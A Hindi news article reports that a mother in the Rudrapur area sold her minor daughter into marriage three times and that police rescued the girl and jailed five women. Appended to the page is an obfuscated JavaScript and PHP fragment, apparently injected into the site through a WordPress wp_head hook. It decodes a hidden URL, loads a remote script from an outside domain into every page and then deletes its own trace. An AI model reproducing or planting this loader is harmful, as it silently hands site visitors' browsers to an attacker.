Saturday, July 13, 2024
spot_img

पैसों के लालच में माँ ने अपनी नाबालिग बेटी को शादी के नाम पर तीन बार बेच दिया,महिला को भेजा जेल

शादी के नाम पर नाबालिग को बेचने का मामला सामने आया है। मामले के बाद आरोपी मां सहित पांच महिलाओं को पुलिस ने पूछताछ करने के बाद जेल भेज दिया है। पूछताछ में पीड़िता ने कई खुलासे किए हैं। पुलिस के मुताबिक, नाबालिग ने बताया कि इससे पहले भी उसे तीन बार अलग-अलग हाथों बेचकर शादी करवाई गई थी। पीड़िता की आरोपी मां ने मनगढ़ंत कहानी गढ़कर अपनी ही बहन पर आरोप लगाकर मुकदमा दर्ज करा दिया था।

एएसपी रुद्रपुर ममता बोहरा के अनुसार नाबालिग ने बताया कि उसकी मां के साथ बने महिलाओं के इस गैंग ने इससे पहले उसे रुद्रपुर और रामपुर के रहने वाले युवकों को शादी के नाम पर बेच दिया था। बिजनौर में उसकी तीसरी शादी करायी गई थी।

बोहरा ने बताया कि नाबालिग के बने आधार कार्ड में पीड़िता की उम्र 18 साल लिखी हुई है, जबकि मामले के खुलासे के बाद नाबालिग की उम्र चार साल कम पायी गई है। जांच में यह भी बात सामने आई है कि शादी का झांसा देकर बेचने के अमानवीय धंधे से पहले मां अपनी नाबालिग बेटी को रुपये के एवज में दूसरे लोगों के पास भेजती थी।


बता दें बीती 20 फरवरी को एक महिला ने अपनी सगी बहन सहित कुछ महिलाओं पर नाबालिग बेटी को बहला-फुसलाकर घर से ले जाने का आरोप लगाया था। महिला ने पुलिस को बताया कि आरोपियों ने उसकी नाबालिग बेटी को बेच दिया है और किसी के साथ उसकी शादी भी करवा दी है। इधर पुलिस ने पड़ताल शुरू की तो मामला परत-दर-परत खुलता गया। निशानदेही पर पुलिस ने बिजनौर के एक घर पर दबिश देकर नाबालिग को छुड़ा लिया और नाबालिग की मां और मौसी, बिचौलिए की भूमिका निभा रही रुद्रपुर निवासी के अलावा रायपुर की रहने वाली पड़ोसी महिला व उसकी बेटी को भी गिरफ्तार कर लिया। जिसके बाद पूरे मामले का खुलासा हुआ।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>